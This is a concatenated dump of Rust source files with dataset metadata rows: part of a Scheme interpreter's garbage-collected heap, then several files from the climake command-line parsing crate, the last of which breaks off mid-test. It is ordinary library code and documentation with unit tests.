ArenaPtr<T> should always have a valid Arena."); arena.marked.set(self.index, true); } } /// During a GC, determine if this `ArenaPtr` has been marked as reachable. fn is_marked(&self) -> bool { unsafe { let arena = self.arena.as_mut() .expect("An ArenaPtr<T> should always have a valid Arena."); return arena.marked.get(self.index) .expect("self.index should always be within the marked bitv's length."); } } } impl<T> Deref for ArenaPtr<T> { type Target = T; fn deref<'a>(&'a self) -> &'a T { unsafe { let arena = self.arena.as_ref() .expect("ArenaPtr::deref should always have an Arena."); &arena.pool[self.index] } } } impl<T> DerefMut for ArenaPtr<T> { fn deref_mut<'a>(&'a mut self) -> &'a mut T { unsafe { let arena = self.arena.as_mut() .expect("ArenaPtr::deref_mut should always have an Arena."); &mut arena.pool[self.index] } } } impl<T> fmt::Debug for ArenaPtr<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ArenaPtr({:p}, {})", &self.arena, &self.index) } } impl<T> cmp::PartialEq for ArenaPtr<T> { /// Note that `PartialEq` implements pointer object identity, not structural /// comparison. In other words, it is equivalent to the scheme function /// `eq?`, not the scheme function `equal?`. fn eq(&self, other: &ArenaPtr<T>) -> bool { self.index == other.index && (self.arena as usize) == (other.arena as usize) } } impl<T> cmp::Eq for ArenaPtr<T> { } /// A trait for types that can be coerced to a `GcThing`. pub trait ToGcThing: fmt::Debug { /// Coerce this value to a `GcThing`. fn to_gc_thing(&self) -> Option<GcThing>; } /// A smart pointer wrapping the pointer type `T`. It keeps its referent rooted /// while the smart pointer is in scope to prevent dangling pointers caused by a /// garbage collection within the pointers lifespan. For more information see /// the module level documentation about rooting. #[allow(raw_pointer_derive)] #[derive(Hash, Debug)] pub struct Rooted<T> { heap: *mut Heap, ptr: T, } impl<T: ToGcThing> Rooted<T> { /// Create a new `Rooted<T>`, rooting the referent. pub fn new(heap: &mut Heap, ptr: T) -> Rooted<T> { let mut r = Rooted { heap: heap, ptr: ptr, }; r.add_root(); r } /// Unroot the current referent and replace it with the given referent, /// which then gets rooted. pub fn emplace(&mut self, rhs: T) { self.drop_root(); self.ptr = rhs; self.add_root(); } /// Add the current referent as a GC root. fn add_root(&mut self) { if let Some(r) = self.ptr.to_gc_thing() { unsafe { self.heap.as_mut() .expect("Rooted<T>::drop should always have a Heap") .add_root(r); } } } /// Unroot the current referent. fn drop_root(&mut self) { unsafe { let heap = self.heap.as_mut() .expect("Rooted<T>::drop should always have a Heap"); heap.drop_root(self); } } } impl<T: ToGcThing> ToGcThing for Rooted<T> { fn to_gc_thing(&self) -> Option<GcThing> { self.ptr.to_gc_thing() } } impl<T> Deref for Rooted<T> { type Target = T; fn deref<'a>(&'a self) -> &'a T { &self.ptr } } impl<T> DerefMut for Rooted<T> { fn deref_mut<'a>(&'a mut self) -> &'a mut T { &mut self.ptr } } #[unsafe_destructor] impl<T: ToGcThing> Drop for Rooted<T> { fn drop(&mut self) { self.drop_root(); } } impl<T: Copy + ToGcThing> Clone for Rooted<T> { fn clone(&self) -> Self { unsafe { let heap = self.heap.as_mut() .expect("Rooted<T>::clone should always have a Heap"); Rooted::new(heap, self.ptr) } } } impl<T: PartialEq> PartialEq for Rooted<T> { fn eq(&self, rhs: &Self) -> bool { **self == **rhs } } impl<T: PartialEq + Eq> Eq for Rooted<T> { } /// A pointer to a string on the heap. pub type StringPtr = ArenaPtr<String>; impl ToGcThing for StringPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_string_ptr(*self)) } } /// A rooted pointer to a string on the heap. pub type RootedStringPtr = Rooted<StringPtr>; /// The scheme heap and GC runtime, containing all allocated cons cells, /// activations, procedures, and strings (including strings for symbols). pub struct Heap { /// The static environment. pub environment: Environment, cons_cells: ArenaSet<Cons>, strings: ArenaSet<String>, activations: ArenaSet<Activation>, procedures: ArenaSet<Procedure>, roots: Vec<(GcThing, usize)>, symbol_table: HashMap<String, StringPtr>, global_activation: ActivationPtr, allocations: usize, allocations_threshold: usize, locations: HashMap<ConsPtr, Location>, } /// The default capacity of cons cells per arena. pub static DEFAULT_CONS_CAPACITY : usize = 1 << 10; /// The default capacity of strings per arena. pub static DEFAULT_STRINGS_CAPACITY : usize = 1 << 10; /// The default capacity of activations per arena. pub static DEFAULT_ACTIVATIONS_CAPACITY : usize = 1 << 10; /// The default capacity of procedures per arena. pub static DEFAULT_PROCEDURES_CAPACITY : usize = 1 << 10; /// ## `Heap` Constructors impl Heap { /// Create a new `Heap` with the default capacity. pub fn new() -> Heap { Heap::with_arenas(ArenaSet::new(DEFAULT_CONS_CAPACITY), ArenaSet::new(DEFAULT_STRINGS_CAPACITY), ArenaSet::new(DEFAULT_ACTIVATIONS_CAPACITY), ArenaSet::new(DEFAULT_PROCEDURES_CAPACITY)) } /// Create a new `Heap` using the given arenas for allocating cons cells and /// strings within. pub fn with_arenas(cons_cells: ArenaSet<Cons>, strings: ArenaSet<String>, mut acts: ArenaSet<Activation>, procs: ArenaSet<Procedure>) -> Heap { let mut global_act = acts.allocate(); let mut env = Environment::new(); define_primitives(&mut env, &mut global_act); let mut h = Heap { environment: env, cons_cells: cons_cells, strings: strings, activations: acts, procedures: procs, global_activation: global_act, roots: vec!(), symbol_table: HashMap::new(), allocations: 0, allocations_threshold: 0, locations: HashMap::new() }; h.reset_gc_pressure(); h } } /// ## `Heap` Allocation Methods impl Heap { /// Allocate a new cons cell and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for cons cells has already reached capacity. pub fn allocate_cons(&mut self) -> RootedConsPtr { self.on_allocation(); let c = self.cons_cells.allocate(); Rooted::new(self, c) } /// Allocate a new string and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for strings has already reached capacity. pub fn allocate_string(&mut self) -> RootedStringPtr { self.on_allocation(); let s = self.strings.allocate(); Rooted::new(self, s) } /// Allocate a new `Activation` and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for activations has already reached capacity. pub fn allocate_activation(&mut self) -> RootedActivationPtr { self.on_allocation(); let a = self.activations.allocate(); Rooted::new(self, a) } /// Allocate a new `Procedure` and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for procedures has already reached capacity. pub fn allocate_procedure(&mut self) -> RootedProcedurePtr { self.on_allocation(); let p = self.procedures.allocate(); Rooted::new(self, p) } } /// ## `Heap` Methods for Garbage Collection impl Heap { /// Perform a garbage collection on the heap. pub fn collect_garbage(&mut self) { self.reset_gc_pressure(); // First, trace the heap graph and mark everything that is reachable. let mut pending_trace = self.get_roots(); while !pending_trace.is_empty() { let mut newly_pending_trace = vec!(); for thing in pending_trace.drain() { if !thing.is_marked() { thing.mark(); for referent in thing.trace() { newly_pending_trace.push(referent); } } } pending_trace.append(&mut newly_pending_trace); } // Second, sweep each `ArenaSet`. self.strings.sweep(); self.activations.sweep(); self.cons_cells.sweep(); self.procedures.sweep(); } /// Explicitly add the given GC thing as a root. pub fn add_root(&mut self, root: GcThing) { for pair in self.roots.iter_mut() { let (ref r, ref mut count) = *pair; if *r == root { *count += 1; return; } } self.roots.push((root, 1)); } /// Unroot a GC thing that was explicitly rooted with `add_root`. pub fn drop_root<T: ToGcThing>(&mut self, root: &Rooted<T>) { if let Some(r) = root.to_gc_thing() { self.roots = self.roots.iter().fold(vec!(), |mut v, pair| { let (ref rr, ref count) = *pair; if r == *rr { if *count == 1 { return v; } else { v.push((*rr, *count - 1)); } } else { v.push((*rr, *count)); } return v; }); } } /// Apply pressure to the GC, and if enough pressure has built up, then /// perform a garbage collection. pub fn increase_gc_pressure(&mut self) { self.allocations += 1; if self.is_too_much_pressure() { self.collect_garbage(); } } /// Get a vector of all of the GC roots. fn get_roots(&self) -> Vec<GcThing> { let mut roots: Vec<GcThing> = self.symbol_table .values() .map(|s| GcThing::from_string_ptr(*s)) .collect(); roots.push(GcThing::from_activation_ptr(self.global_activation)); for pair in self.roots.iter() { let (ref root, _) = *pair; roots.push(*root); } for cons in self.locations.keys() { roots.push(GcThing::from_cons_ptr(*cons)); } roots } /// A method that should be called on every allocation. fn on_allocation(&mut self) { self.increase_gc_pressure(); } /// Returns true when we have built up too much GC pressure, and it is time /// to collect garbage. False otherwise. fn is_too_much_pressure(&mut self) -> bool { self.allocations > self.allocations_threshold } /// Resets the GC pressure, so that it must build all the way back up to the /// max again before a GC is triggered. #[inline] fn reset_gc_pressure(&mut self) { self.allocations = 0; self.allocations_threshold = ((self.cons_cells.capacity / 2) * self.cons_cells.arenas.len()) + ((self.strings.capacity / 2) * self.strings.arenas.len()) + ((self.activations.capacity / 2) * self.activations.arenas.len()) + ((self.procedures.capacity / 2) * self.procedures.arenas.len()); } } /// ## `Heap` Environment Methods impl Heap { /// Get the global activation. pub fn global_activation(&mut self) -> RootedActivationPtr { let act = self.global_activation; Rooted::new(self, act) } /// Extend the environment with a new lexical block containing the given /// variables and then perform some work before popping the new block. pub fn with_extended_env<T>(&mut self, names: Vec<String>, block: &Fn(&mut Heap) -> T) -> T { self.environment.extend(names); let result = block(self); self.environment.pop(); result } } /// ## `Heap` Methods for Source Locations impl Heap { /// Register the given pair as having originated from the given location. pub fn enlocate(&mut self, loc: Location, cons: RootedConsPtr) { self.locations.insert(*cons, loc); } /// Get the registered source location of the given pair. If the pair was /// not created by the reader, then None is returned. pub fn locate(&self, cons: &RootedConsPtr) -> Location { self.locations.get(&**cons) .map(|loc| loc.clone()) .unwrap_or_else(Location::unknown) } } /// ## `Heap` Methods for Symbols impl Heap { /// Ensure that there is an interned symbol extant for the given `String` /// and return it. pub fn get_or_create_symbol(&mut self, str: String) -> RootedValue { if self.symbol_table.contains_key(&str) { let sym_ptr = self.symbol_table[str]; let rooted_sym_ptr = Rooted::new(self, sym_ptr); return Value::new_symbol(self, rooted_sym_ptr); } let mut symbol = self.allocate_string(); symbol.clear(); symbol.push_str(str.as_slice()); self.symbol_table.insert(str, *symbol); return Value::new_symbol(self, symbol); } pub fn quote_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("quote".to_string()) } pub fn if_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("if".to_string()) } pub fn begin_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("begin".to_string()) } pub fn define_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("define".to_string()) } pub fn set_bang_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("set!".to_string()) } pub fn unspecified_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("unspecified".to_string()) } pub fn lambda_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("lambda".to_string()) } pub fn eof_symbol(&mut self) -> RootedValue { // Per R4RS, the EOF object must be something that is impossible to // read. We fulfill that contract by having spaces in a symbol. self.get_or_create_symbol("< END OF FILE >".to_string()) } } /// An iterable of `GcThing`s. pub type IterGcThing = IntoIter<GcThing>; /// The `Trace` trait allows GC participants to inform the collector of their /// references to other GC things. /// /// For example, imagine we had a `Trio` type that contained three cons cells: /// /// struct Trio { /// first: ConsPtr, /// second: ConsPtr, /// third: ConsPtr, /// } /// /// `Trio`'s implementation of `Trace` must yield all of its cons pointers, or /// else their referents could be reclaimed by the garbage collector, and the /// `Trio` would have dangling pointers, leading to undefined behavior and bad /// things when it dereferences them in the future. /// /// impl Trace for Trio { /// fn trace(&self) -> IterGcThing { /// let refs = vec!(GcThing::from_cons_ptr(self.first), /// GcThing::from_cons_ptr(self.second), /// GcThing::from_cons_ptr(self.third)); /// refs.into_iter() /// } /// } pub trait Trace { /// Return an iterable of all of the GC things referenced by this structure. fn trace(&self) -> IterGcThing; } /// The union of the various types that are GC things. #[derive(Copy, Eq, Hash, PartialEq, Debug)] pub enum GcThing { Cons(ConsPtr), String(StringPtr), Activation(ActivationPtr), Procedure(ProcedurePtr), } /// ## `GcThing` Constructors impl GcThing { /// Create a `GcThing` from a `StringPtr`. pub fn from_string_ptr(str: StringPtr) -> GcThing { GcThing::String(str) } /// Create a `GcThing` from a `ConsPtr`. pub fn from_cons_ptr(cons: ConsPtr) -> GcThing { GcThing::Cons(cons) } /// Create a `GcThing` from a `ProcedurePtr`. pub fn from_procedure_ptr(procedure: ProcedurePtr) -> GcThing { GcThing::Procedure(procedure) } /// Create a `GcThing` from an `ActivationPtr`. pub fn from_activation_ptr(act: ActivationPtr) -> GcThing { GcThing::Activation(act) } } impl GcThing { /// During a GC, mark this `GcThing` as reachable. #[inline] fn mark(&self) { match *self { GcThing::Cons(ref p) => p.mark(), GcThing::String(ref p) => p.mark(), GcThing::Activation(ref p) => p.mark(), GcThing::Procedure(ref p) => p.mark(), } } /// During a GC, determine if this `GcThing` has been marked as reachable. #[inline] fn is_marked(&self) -> bool { match *self { GcThing::Cons(ref p) => p.is_marked(), GcThing::String(ref p) => p.is_marked(), GcThing::Activation(ref p) => p.is_marked(), GcThing::Procedure(ref p) => p.is_marked(), } } } impl Trace for GcThing { fn trace(&self) -> IterGcThing { match *self { GcThing::Cons(cons) => cons.trace(), GcThing::Activation(act) => act.trace(), GcThing::Procedure(p) => p.trace(), // Strings don't hold any strong references to other `GcThing`s. GcThing::String(_) => vec!().into_iter(), } } } #[test] fn test_heap_allocate_tons() { use eval::evaluate_file; let heap = &mut Heap::new(); evaluate_file(heap, "./tests/test_heap_allocate_tons.scm") .ok() .expect("Should be able to eval a file."); assert!(true, "Should have successfully run the program and allocated many cons cells"); }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/prelude.rs
src/prelude.rs
//! Prelude for climake to allow easy importing of data structures //! //! # Contents //! //! This prelude is small as climake itself isn't a woefully complex library, //! here's what this prelude includes: //! //! - Base-level //! - [climake::Argument](Argument) //! - [climake::CliMake](CliMake) //! - [climake::Subcommand](Subcommand) //! - IO structures //! - [climake::io::Data](Data) //! - [climake::io::Input](Input) //! - Parsed structures //! - [climake::parsed::ParsedArgument](ParsedArgument) //! - [climake::parsed::ParsedCli](ParsedCli) //! - [climake::parsed::ParsedSubcommand](ParsedSubcommand) pub use crate::io::{Data, Input}; pub use crate::parsed::{ParsedArgument, ParsedCli, ParsedSubcommand}; pub use crate::{Argument, CliMake, Subcommand};
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/lib.rs
src/lib.rs
//! The simplistic, dependency-free cli library ✨ //! //! - **[Documentation](https://docs.rs/climake)** //! - [Crates.io](https://crates.io/crates/climake) //! //! # Example 📚 //! //! Demo of a simple package manager: //! //! ```rust //! use climake::prelude::*; //! //! fn main() { //! let package = Argument::new( //! "The package name", //! vec!['p', 'i'], //! vec!["pkg, package"], //! Input::Text, //! ); //! //! let add = Subcommand::new("add", vec![&package], vec![], "Adds a package"); //! let rem = Subcommand::new("rem", vec![&package], vec![], "Removes a package"); //! //! let cli = CliMake::new( //! "MyPkg", //! vec![], //! vec![&add, &rem], //! "A simple package manager demo", //! "1.0.0", //! ); //! //! let parsed = cli.parse(); //! //! for subcommand in parsed.subcommands { //! if subcommand.inner == &add { //! println!("Adding package {:?}..", subcommand.arguments[0]); //! } else if subcommand.inner == &rem { //! println!("Removing package {:?}..", subcommand.arguments[0]); //! } //! } //! } //! ``` //! //! ## Installation 🚀 //! //! Simply add the following to your `Cargo.toml` file: //! //! ```toml //! [dependencies] //! climake = "3.0.0-pre.1" # rewrite isn't out just yet! //! ``` //! //! # License //! //! This library is duel-licensed under both the [MIT License](https://opensource.org/licenses/MIT) //! ([`LICENSE-MIT`](https://github.com/rust-cli/climake/blob/master/LICENSE-MIT)) //! and [Apache 2.0 License](https://www.apache.org/licenses/LICENSE-2.0) //! ([`LICENSE-APACHE`](https://github.com/rust-cli/climake/blob/master/LICENSE-APACHE)), //! you may choose at your discretion. #![forbid(unsafe_code)] #![doc( html_logo_url = "https://github.com/rust-cli/climake/raw/master/logo.png", html_favicon_url = "https://github.com/rust-cli/climake/raw/master/logo.png" )] /// Default help message for [Argument]s without help added const HELP_DEFAULT: &str = "No help provided"; /// Tabs to render for cli arguments. This will be subtracted from 80 char width /// of terminals allowed so spaces are reccomended const CLI_TABBING: &str = " "; mod core; pub mod io; pub mod parsed; pub mod prelude; pub use crate::core::*;
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/io.rs
src/io.rs
//! Input and output structures for climake which allow inputs for args along //! with outputs passed back //! //! # Importing //! //! This module is included in [crate::prelude] by default so no extra importing //! steps are required (unless you are importing explicit items). use std::fmt; use std::path::PathBuf; /// An input type, typically given for an [Argument](crate::Argument) to descibe /// what types are allowed to be passwed in. This is then transferred to [Data] /// once the cli has been executed #[derive(Debug, PartialEq, Clone)] pub enum Input { /// No input allowed, will error if any is given. Maps to [Data::None] None, /// Text input allowed, this will return an empty string if no text is supplied. /// Maps to [Data::Text] Text, /// A single [PathBuf] given to the argument, these are not certain to exist /// and simply echo the user's input. Maps to [Data::Path] Path, /// Multiple [PathBuf]s given to the argument, these are not certain to exist /// and simply echo the user's input. Maps to [Data::Paths] Paths, } impl fmt::Display for Input { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { // formatting has a space on existing words on purpouse for help generation match self { Input::None => write!(f, ""), Input::Text => write!(f, "[text] "), Input::Path => write!(f, "[path] "), Input::Paths => write!(f, "[paths] "), } } } /// Outputted data from parsing a cli for each argument. This enumeration is based /// upon the allowed [Input] of a given [Argument](crate::Argument) and maps /// directly to the input /// /// # Mappings from [Input] /// /// If a user requested for an [Argument](crate::Argument) to be of [Input::Path], /// once parsed this enumeration would be [Data::Path] (in corrospondance with /// the name). /// #[derive(Debug, PartialEq, Clone)] pub enum Data { /// No data provided, from [Input::None] None, /// Textual input provided, from [Input::Text]. This may be an empty string /// in the case of the user not actually providing input Text(String), /// Path input provided, from [Input::Path]. This may be an empty or invalid /// [PathBuf] in the case of user input being misleading or non-existant Path(PathBuf), /// Multiple path inputs provided, from [Input::Paths]. This may be an empty /// vector (i.e. length 0) if the user doesn't provide any paths or may be /// non-existant paths given from user input Paths(Vec<PathBuf>), } impl Data { /// Creates a new [Data] from with types mapping from [Input] using passed /// `data`. This may map the `data` string vec into types such as `PathBuf` pub(crate) fn new(input: Input, data: impl IntoIterator<Item = String>) -> Self { match input { Input::None => Data::None, // ignore passed `data` (if any) Input::Text => match data.into_iter().next() { Some(text) => Data::Text(text), None => Data::Text(String::new()), }, Input::Path => match data.into_iter().next() { Some(path_string) => Data::Path(PathBuf::from(path_string)), None => Data::Path(PathBuf::new()), }, Input::Paths => Data::Paths( data.into_iter() .map(|path_string| PathBuf::from(path_string)) .collect(), ), } } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Data::new] method works correctly #[test] fn data_new() { let testval = String::from("Hi!"); // Data::None assert_eq!(Data::new(Input::None, vec![]), Data::None); assert_eq!(Data::new(Input::None, vec![testval.clone()]), Data::None); // Data::Text assert_eq!(Data::new(Input::Text, vec![]), Data::Text(String::new())); assert_eq!( Data::new(Input::Text, vec![testval.clone()]), Data::Text(testval.clone()) ); assert_eq!( Data::new(Input::Text, vec![testval.clone(), testval.clone()]), Data::Text(testval.clone()) ); // Data::Path assert_eq!(Data::new(Input::Path, vec![]), Data::Path(PathBuf::new())); assert_eq!( Data::new(Input::Path, vec![testval.clone()]), Data::Path(PathBuf::from(testval.clone())) ); assert_eq!( Data::new(Input::Path, vec![testval.clone(), testval.clone()]), Data::Path(PathBuf::from(testval.clone())) ); // Data::Paths assert_eq!(Data::new(Input::Paths, vec![]), Data::Paths(vec![])); assert_eq!( Data::new(Input::Paths, vec![testval.clone()]), Data::Paths(vec![PathBuf::from(testval.clone())]) ); assert_eq!( Data::new(Input::Paths, vec![testval.clone(), testval.clone()]), Data::Paths(vec![PathBuf::from(testval.clone()), PathBuf::from(testval)]) ); } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/parsed.rs
src/parsed.rs
//! Structures that allow the containing of completed parsing from the cli //! //! # Importing //! //! This module is included in [crate::prelude] by default so no extra importing //! steps are required (unless you are importing explicit items). use crate::io::Data; use crate::{Argument, Subcommand}; /// Used argument stemming from [CliMake::parse](crate::CliMake::parse)-related /// parsing /// /// This structure contains a reference to the underlying argument and data passed /// by user (if any). /// /// # Implementations /// /// This structure may be converted into a raw [Argument] with the use of the /// [From]<[ParsedArgument]> implementation or similarly to the [Data] used for /// this argument. #[derive(Debug, PartialEq, Clone)] pub struct ParsedArgument<'a> { /// Reference to the argument used pub inner: &'a Argument<'a>, /// Passed data for this argument pub data: Data, } impl<'a> From<ParsedArgument<'a>> for &'a Argument<'a> { fn from(parsed_argument: ParsedArgument<'a>) -> Self { parsed_argument.inner } } impl<'a> From<ParsedArgument<'a>> for Data { fn from(parsed_argument: ParsedArgument<'a>) -> Self { parsed_argument.data } } /// Used subcommand stemming from [CliMake::parse](crate::CliMake::parse)-related /// parsing /// /// This strcuture contains a reference to the underlying subcommand and all other /// subcommands/arguments below that in a similar [ParsedSubcommand]/[ParsedArgument] /// recursion. /// /// # Implementations /// /// This structure may be converted into a raw [Subcommand] with the use of the /// [From]<[ParsedSubcommand]> implementation or similarly the [ParsedSubcommand::subcommands] /// and [ParsedSubcommand::arguments] vectors. #[derive(Debug, PartialEq, Clone)] pub struct ParsedSubcommand<'a> { /// Reference to the subcommand used pub inner: &'a Subcommand<'a>, /// Used subcommands contained inside of this subcommand (if any) pub subcommands: Vec<ParsedSubcommand<'a>>, /// Used arguments contained inside of this subcommand (if any) pub arguments: Vec<ParsedArgument<'a>>, } impl<'a> ParsedSubcommand<'a> { /// Internal method which creates a new, empty [ParsedSubcommand] for use /// whilst parsing pub(crate) fn new_empty(subcommand: &'a Subcommand<'a>) -> Self { Self { inner: subcommand, subcommands: vec![], arguments: vec![], } } } impl<'a> From<ParsedSubcommand<'a>> for &'a Subcommand<'a> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.inner } } impl<'a> From<ParsedSubcommand<'a>> for Vec<ParsedSubcommand<'a>> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.subcommands } } impl<'a> From<ParsedSubcommand<'a>> for Vec<ParsedArgument<'a>> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.arguments } } /// Similar to [ParsedSubcommand], contains the top-level parsed arguments from /// [CliMake::parse](crate::CliMake::parse)-related parsing /// /// # Implementations /// /// This structure may be converted into a vector of subcommands from [ParsedCli::subcommands] /// or arguments from [ParsedCli::arguments]. #[derive(Debug, PartialEq, Clone)] pub struct ParsedCli<'a> { /// Used subcommands contained inside of top-level parsed pub subcommands: Vec<ParsedSubcommand<'a>>, /// Used arguments contained inside of top-level parsed pub arguments: Vec<ParsedArgument<'a>>, } impl<'a> From<ParsedCli<'a>> for Vec<ParsedSubcommand<'a>> { fn from(used_cli: ParsedCli<'a>) -> Self { used_cli.subcommands } } impl<'a> From<ParsedCli<'a>> for Vec<ParsedArgument<'a>> { fn from(used_cli: ParsedCli<'a>) -> Self { used_cli.arguments } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/core/argument.rs
src/core/argument.rs
//! Contains [Argument]-related items, see specific documentation for more information use super::utils::writeln_term; use crate::io::Input; use crate::HELP_DEFAULT; use std::fmt; use std::io::Write; /// An argument attached to the cli, allowing passing of user data to the top-level /// cli or subcommands #[derive(Debug, PartialEq, Clone)] pub struct Argument<'a> { /// Optional help message help: Option<&'a str>, /// Many [CallType]s corrosponding to this argument calls: Vec<CallType>, /// [Input] type allowed for this argument input: Input, /// Required argument for given root cli or [Subcommand](crate::Subcommand). /// If this argument is not present whilst the cli parses, it will provide an /// apt error /// /// To change the default behaviour of `false` (not required), simply modify /// this value before it's time to parse. required: bool, } impl<'a> Argument<'a> { /// Creates a new [Argument] from given passed values pub fn new( help: impl Into<Option<&'a str>>, short_calls: impl IntoIterator<Item = char>, long_calls: impl IntoIterator<Item = &'a str>, input: impl Into<Input>, ) -> Self { let mut calls: Vec<CallType> = short_calls .into_iter() .map(|call| CallType::Short(call)) .collect(); calls.append( &mut long_calls .into_iter() .map(|call| CallType::Long(call.to_string())) .collect::<Vec<CallType>>(), ); Self { help: help.into(), calls, input: input.into(), required: false, } } /// Adds a single short call, chainable pub fn add_scall(&mut self, short_call: impl Into<char>) -> &mut Self { self.calls.push(short_call.into().into()); self } /// Adds multiple short calls, chainable pub fn add_scalls(&mut self, short_calls: impl IntoIterator<Item = char>) -> &mut Self { for c in short_calls.into_iter() { self.add_scall(c); } self } /// Adds a single long call, chainable pub fn add_lcall(&mut self, long_call: impl Into<String>) -> &mut Self { self.calls.push(long_call.into().into()); self } /// Adds multiple long calls, chainable pub fn add_lcalls(&mut self, long_calls: impl IntoIterator<Item = String>) -> &mut Self { for c in long_calls.into_iter() { self.add_lcall(c); } self } /// Generates compact help message for current [Argument] /// /// This writes directly to a buffer of some kind (typically [std::io::stdout]) /// for simplicity, perf and extendability reasons. /// /// # Example /// /// What this may look like: /// /// ```none /// (-v, --verbose) — Verbose mode /// ``` pub(crate) fn help_name_msg(&self, buf: &mut impl Write) -> std::io::Result<()> { let mut lc_buf: Vec<String> = Vec::new(); let mut sc_buf: Vec<char> = Vec::new(); for call in self.calls.iter() { match call { CallType::Long(call) => lc_buf.push(format!("--{}", call)), CallType::Short(call) => sc_buf.push(*call), } } let short_calls: String = if sc_buf.len() == 0 { String::new() } else { format!("-{}", sc_buf.iter().collect::<String>()) }; let mut formatted_calls = vec![short_calls]; formatted_calls.append(&mut lc_buf); let formatted_help = match self.help { Some(msg) => msg, None => HELP_DEFAULT, }; let required_msg = if self.required { "[REQUIRED] " } else { "" }; writeln_term( if formatted_calls.len() == 1 && formatted_calls[0] != "" { format!( "{} {}{}— {}", formatted_calls[0], self.input, required_msg, formatted_help ) } else { format!( "({}) {}{}— {}", formatted_calls.join(", "), self.input, required_msg, formatted_help, ) }, buf, ) } } /// A single type of call for an [Argument], can be a short call or a long call #[derive(Debug, PartialEq, Clone)] pub(crate) enum CallType { /// Short, single-char call, e.g. `-h` Short(char), /// Long, multi-char call, e.g. `--hello` Long(String), } impl fmt::Display for CallType { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { CallType::Short(c) => write!(f, "{}", c), CallType::Long(string) => write!(f, "--{}", string), } } } impl From<CallType> for String { fn from(calltype: CallType) -> Self { match calltype { CallType::Short(c) => String::from(c), CallType::Long(string) => string, } } } impl From<char> for CallType { fn from(c: char) -> Self { CallType::Short(c) } } impl From<String> for CallType { fn from(string: String) -> Self { CallType::Long(string) } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Argument::new] method (creation of arguments) works correctly #[test] fn arg_new() { assert_eq!( Argument::new(None, vec!['a', 'b'], vec!["hi", "there"], Input::Text), Argument { calls: vec![ CallType::Short('a'), CallType::Short('b'), CallType::Long("hi".to_string()), CallType::Long("there".to_string()) ], help: None, input: Input::Text, required: false, } ) } /// Checks that the [Argument::help_name_msg] method works correctly #[test] fn name_help() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; Argument::new(None, vec![], vec![], Input::None).help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " () — No help provided\n" ); chk_vec = vec![]; Argument::new("Some simple help", vec!['a'], vec!["long"], Input::Text) .help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " (-a, --long) [text] — Some simple help\n" ); chk_vec = vec![]; Argument::new(None, vec!['a'], vec![], Input::Text).help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " -a [text] — No help provided\n" ); Ok(()) } /// Checks that the [Argument::help_name_msg] method works correctly with [Argument::required] /// set to `true` #[test] fn name_help_required() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; let mut arg = Argument::new("Some argument", vec!['s'], vec![], Input::None); arg.required = true; arg.help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " -s [REQUIRED] — Some argument\n" ); Ok(()) } /// Checks that the [Argument::add_scall] method works correctly #[test] fn add_scall() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_scall('a').add_scall('b').add_scall('c'); assert_eq!( arg, Argument::new("example", vec!['a', 'b', 'c'], vec![], Input::None) ) } /// Checks that the [Argument::add_scalls] method works correctly #[test] fn add_scalls() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_scalls(vec!['a', 'b']).add_scalls(vec!['c']); assert_eq!( arg, Argument::new("example", vec!['a', 'b', 'c'], vec![], Input::None) ) } /// Checks that the [Argument::add_lcall] method works correctly #[test] fn add_lcall() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_lcall("a").add_lcall("b").add_lcall("c"); assert_eq!( arg, Argument::new("example", vec![], vec!["a", "b", "c"], Input::None) ) } /// Checks that the [Argument::add_lcalls] method works correctly #[test] fn add_lcalls() { let mut arg = Argument::new("example", vec![], vec![], Input::None); 